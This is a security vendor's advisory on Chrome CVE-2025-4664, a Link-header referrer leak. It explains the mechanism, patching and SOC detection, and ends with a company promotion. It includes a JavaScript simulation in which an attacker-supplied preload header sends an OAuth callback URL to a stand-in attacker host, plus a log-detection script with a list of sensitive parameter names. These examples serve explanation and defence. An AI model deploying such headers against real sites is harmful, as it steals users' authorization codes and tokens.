
Chrome CVE-2025-4664: Cross-Origin Data Leak Vulnerability Exploited in the Wild

May 2025 — A newly disclosed Chrome vulnerability tracked as CVE-2025-4664 is drawing urgent attention across the security community. The flaw, identified as a case of insufficient policy enforcement in Chrome’s Loader component, allows attackers to bypass same-origin restrictions and exfiltrate sensitive query parameters to third-party domains. Google released a patch for the issue on May 14, 2025, as part of Chrome version 136.0.7103.113, but the vulnerability has already been actively exploited in the wild.


What Is CVE-2025-4664?

CVE-2025-4664 stems from how Chrome handled the Link HTTP header on sub-resource responses. Other browsers ignore a Link header returned with a sub-resource such as an image, but Chrome processed it, including any referrerpolicy attribute it carried. An attacker who controls a resource embedded in a victim page, or who lures the user to a crafted page, can therefore answer a sub-resource request with a Link header that declares a preload from an attacker-controlled domain with referrerpolicy=unsafe-url. Chrome then fetched that preload target and sent the full URL of the embedding page, query string included, in the Referer header, where the default strict-origin-when-cross-origin policy would have sent only the origin.

This subtle behavior opens the door to cross-origin data leaks. If a page's URL carries sensitive values in its query string, such as OAuth authorization codes, session tokens, user IDs, or email addresses, those values are silently handed to the third party. The CVSS v3 score is listed as 4.3 (medium severity), but the real-world impact depends heavily on how an application handles authentication and data in URLs: a leaked authorization code on an OAuth callback page can be enough for account takeover.
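To make the mechanism concrete, the following is an added example (not code from the original article, from Google, or from the researcher) that models two things in plain JavaScript: the Referrer Policy algorithm that decides what goes into the Referer header, and the Link-header preload step that the vulnerable loader honoured. The hosts app.example and attacker.example, the Link header value, and the query parameters are made up for the demonstration; the referrer computation is a simplified reading of the W3C Referrer Policy spec, not Chrome's code.

```javascript
// Added example: simplified model of Referrer Policy and of the Link-header
// preload step abused by CVE-2025-4664. Not Chrome's implementation.
// Hosts, header values and query parameters below are constructed.

// Referer value a browser sends for requestUrl from documentUrl under
// `policy`, following https://w3c.github.io/webappsec-referrer-policy/
// in simplified form (a "downgrade" here is https document -> http request).
function computeReferer(documentUrl, requestUrl, policy) {
  const doc = new URL(documentUrl);
  const req = new URL(requestUrl);
  const stripped = new URL(documentUrl); // credentials and fragment never go out
  stripped.username = '';
  stripped.password = '';
  stripped.hash = '';
  const full = stripped.href;            // path AND query are kept
  const originOnly = doc.origin + '/';   // scheme://host[:port]/ only
  const sameOrigin = doc.origin === req.origin;
  const downgrade = doc.protocol === 'https:' && req.protocol === 'http:';

  switch (policy) {
    case 'no-referrer': return null;
    case 'unsafe-url': return full;
    case 'origin': return originOnly;
    case 'same-origin': return sameOrigin ? full : null;
    case 'strict-origin': return downgrade ? null : originOnly;
    case 'no-referrer-when-downgrade': return downgrade ? null : full;
    case 'origin-when-cross-origin': return sameOrigin ? full : originOnly;
    case 'strict-origin-when-cross-origin':
    default: // Chrome's default policy since version 85
      if (sameOrigin) return full;
      return downgrade ? null : originOnly;
  }
}

// Minimal parser for an HTTP Link header value (RFC 8288 style):
//   <url>; rel=preload; as=image; referrerpolicy=unsafe-url, <url2>; rel=...
function parseLinkHeader(value) {
  const links = [];
  const re = /<([^>]*)>((?:\s*;\s*[^,;]+)*)/g;
  let m;
  while ((m = re.exec(value)) !== null) {
    const params = {};
    for (const part of m[2].split(';')) {
      const t = part.trim();
      if (!t) continue;
      const eq = t.indexOf('=');
      if (eq === -1) params[t.toLowerCase()] = '';
      else params[t.slice(0, eq).trim().toLowerCase()] = t.slice(eq + 1).trim().replace(/^"|"$/g, '');
    }
    links.push({ url: m[1], params });
  }
  return links;
}

// Model of the vulnerable behaviour: a sub-resource response carries a Link
// header, the browser honours its rel=preload entries, and the entry's own
// referrerpolicy overrides the document's policy for the preload fetch.
function simulatePreload(documentUrl, linkHeader, documentPolicy = 'strict-origin-when-cross-origin') {
  return parseLinkHeader(linkHeader)
    .filter((l) => (l.params.rel || '').split(/\s+/).includes('preload'))
    .map((l) => {
      const target = new URL(l.url, documentUrl).href;
      const policy = l.params.referrerpolicy || documentPolicy;
      const referer = computeReferer(documentUrl, target, policy);
      const leakedParams = referer ? [...new URL(referer).searchParams.keys()] : [];
      return { target, policy, referer, leakedParams };
    });
}

// Constructed scenario: an OAuth callback page that embeds an attacker-controlled image.
const DOCUMENT_URL = 'https://app.example/oauth/callback?code=AbC123&state=xyz';
const ATTACKER_LINK = '<https://attacker.example/collect.png>; rel=preload; as=image; referrerpolicy=unsafe-url';

function demo() {
  return {
    // what a normal cross-origin image fetch from this page would reveal
    normal: computeReferer(DOCUMENT_URL, 'https://attacker.example/collect.png', 'strict-origin-when-cross-origin'),
    // what the attacker-supplied preload policy reveals
    leak: simulatePreload(DOCUMENT_URL, ATTACKER_LINK),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Under the default policy the third party sees only `https://app.example/`; with the attacker-chosen `unsafe-url` it receives the whole callback URL, including `code` and `state`. The model does not represent the fix; it shows why the policy choice alone decides whether the query string leaves the origin.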


Active Exploitation and Research Disclosure

The vulnerability was responsibly disclosed by security researcher Vsevolod Kokorin (@slonser_), who also published a proof-of-concept on May 5. Google confirmed that exploits for this vulnerability exist in the wild, though no targeted campaigns have been publicly attributed yet. CVE-2025-4664 follows closely on the heels of another Chrome zero-day, CVE-2025-2783, which was exploited by threat actors earlier this year in espionage operations.


Mitigation and Patching

Google’s fix ships in Chrome 136.0.7103.113/.114 for Windows and macOS and 136.0.7103.113 for Linux, rolling out through the stable channel over the following days and weeks. Users of other Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, should apply security updates as soon as their vendors release builds that include the fix.

Administrators should verify that Chrome instances across managed environments have been updated (chrome://settings/help shows the installed build and triggers an update check) and consider enterprise policy controls that block outdated versions of the browser. Content Security Policy (CSP) and Referrer-Policy headers should also be reviewed and explicitly defined. A Referrer-Policy header on the page does not by itself defeat this bug, since the leaking policy came from the attacker’s response, but a restrictive CSP that limits where sub-resources may be fetched from narrows the set of hosts such a preload could reach.


What SOC Teams Need to Know

Security Operations Center (SOC) teams should prioritize monitoring for potential abuse of this vulnerability, especially in environments where sensitive data may be passed via URL query parameters. While this is widely recognized as poor practice, it remains common in many web applications (OAuth callbacks being the obvious case), making this vulnerability a viable vector for session hijacking and data leakage.

Analysts should inspect outbound traffic for image or other sub-resource requests to third-party domains whose Referer header carries a query string. Detection rules within SIEM platforms should flag outbound requests whose Referer includes token-like parameters (code, token, session, email, and similar), especially from user agents identifying Chrome versions prior to 136.0.7103.113. Record the parameter names and the destination host rather than the parameter values, so the SIEM does not become a second copy of the leaked secret.
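The following is an added example of that detection logic (not code from the original article or from any vendor) run over a few constructed proxy log lines. The log format (timestamp, client, method, quoted URL, status, quoted Referer, quoted User-Agent), the hosts, and the client addresses are all made up; adapt the line regex to your proxy's format. It compares hostnames only, so a cross-subdomain CDN would be flagged as third-party and needs an allowlist in practice.

```javascript
// Added example: SIEM-style detection over constructed proxy log lines.
// Log format, hosts, addresses and user agents below are made up.

const FIXED_CHROME = '136.0.7103.113';

// Query parameter names that commonly carry secrets; extend for your apps.
const SENSITIVE_PARAMS = new Set([
  'code', 'token', 'access_token', 'id_token', 'refresh_token',
  'session', 'sessionid', 'sid', 'jwt', 'api_key', 'apikey', 'email', 'user_id',
]);

// Constructed sample: ts client method "url" status "referer" "user-agent"
const SAMPLE_LOG = `
2025-05-15T10:02:11Z 10.1.2.3 GET "https://cdn.example/img/logo.png" 200 "https://app.example/dashboard" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/136.0.7103.92 Safari/537.36"
2025-05-15T10:02:12Z 10.1.2.3 GET "https://attacker.example/collect.png" 200 "https://app.example/oauth/callback?code=AbC123&state=xyz" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/136.0.7103.92 Safari/537.36"
2025-05-15T10:03:40Z 10.1.2.7 GET "https://attacker.example/collect.png" 200 "https://app.example/oauth/callback?code=Qq9&state=k1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) Chrome/136.0.7103.114 Safari/537.36"
2025-05-15T10:04:01Z 10.1.2.9 GET "https://app.example/api/me" 200 "https://app.example/settings?email=a%40b.example" "Mozilla/5.0 (X11; Linux x86_64) Chrome/135.0.7049.114 Safari/537.36"
`.trim();

const LINE_RE = /^(\S+) (\S+) (\S+) "([^"]*)" (\d+) "([^"]*)" "([^"]*)"$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ts: m[1], client: m[2], method: m[3], url: m[4], status: Number(m[5]), referer: m[6], ua: m[7] };
}

// Numeric dotted-version compare: -1, 0 or 1. Missing components count as 0.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] || 0, y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

function chromeVersion(ua) {
  const m = /Chrome\/(\d+(?:\.\d+)*)/.exec(ua);
  return m ? m[1] : null;
}

// Flag cross-site sub-resource requests whose Referer query string carries
// token-like parameter names. Only names are recorded, never values.
function analyzeLog(text) {
  const findings = [];
  for (const line of text.split('\n')) {
    const rec = parseLine(line);
    if (!rec || !rec.referer) continue;
    let ref, req;
    try { ref = new URL(rec.referer); req = new URL(rec.url); } catch { continue; }
    if (ref.hostname === req.hostname) continue; // same site: not a cross-origin leak
    const sensitiveParams = [...ref.searchParams.keys()].filter((k) => SENSITIVE_PARAMS.has(k.toLowerCase()));
    if (sensitiveParams.length === 0) continue;
    const ver = chromeVersion(rec.ua);
    findings.push({
      ts: rec.ts,
      client: rec.client,
      destinationHost: req.hostname,
      refererPage: ref.origin + ref.pathname, // query deliberately dropped
      sensitiveParams,
      chromeVersion: ver,
      chromeVulnerable: ver !== null && compareVersions(ver, FIXED_CHROME) < 0,
    });
  }
  return findings;
}

for (const f of analyzeLog(SAMPLE_LOG)) console.log(JSON.stringify(f));
```

Two of the four constructed lines are flagged: both carry an OAuth `code` parameter in the Referer of a request to attacker.example. The first comes from an unpatched build and is the one to escalate; the second comes from a patched build, which still deserves a look because the application is exposing a code in a URL to a third party regardless of the browser bug.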

Teams should also validate internal web applications for adherence to modern security headers. Sites should never set unsafe-url as their referrer policy and should explicitly define a strict Referrer-Policy header to limit exposure; that header is good hygiene rather than a fix for this particular bug, since the attacker supplied the policy here, so the durable defense is to keep secrets out of URLs altogether. Developers should not place tokens, authorization codes, or credentials in the URL path or query string; these belong in headers or POST bodies, and any value that must transit a URL should be single-use and short-lived.

In organizations where browser management is part of the IT stack, ensure Chrome auto-updates are enforced and that no legacy Chromium-based browsers are permitted to access sensitive internal applications. With known exploits circulating, unmanaged browser instances may represent a weak point in an otherwise hardened perimeter.


How Can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

Questions or concerns? Feel free to reach out to us any time –

https://www.netizen.net/contact


Copyright © Netizen Corporation. All Rights Reserved.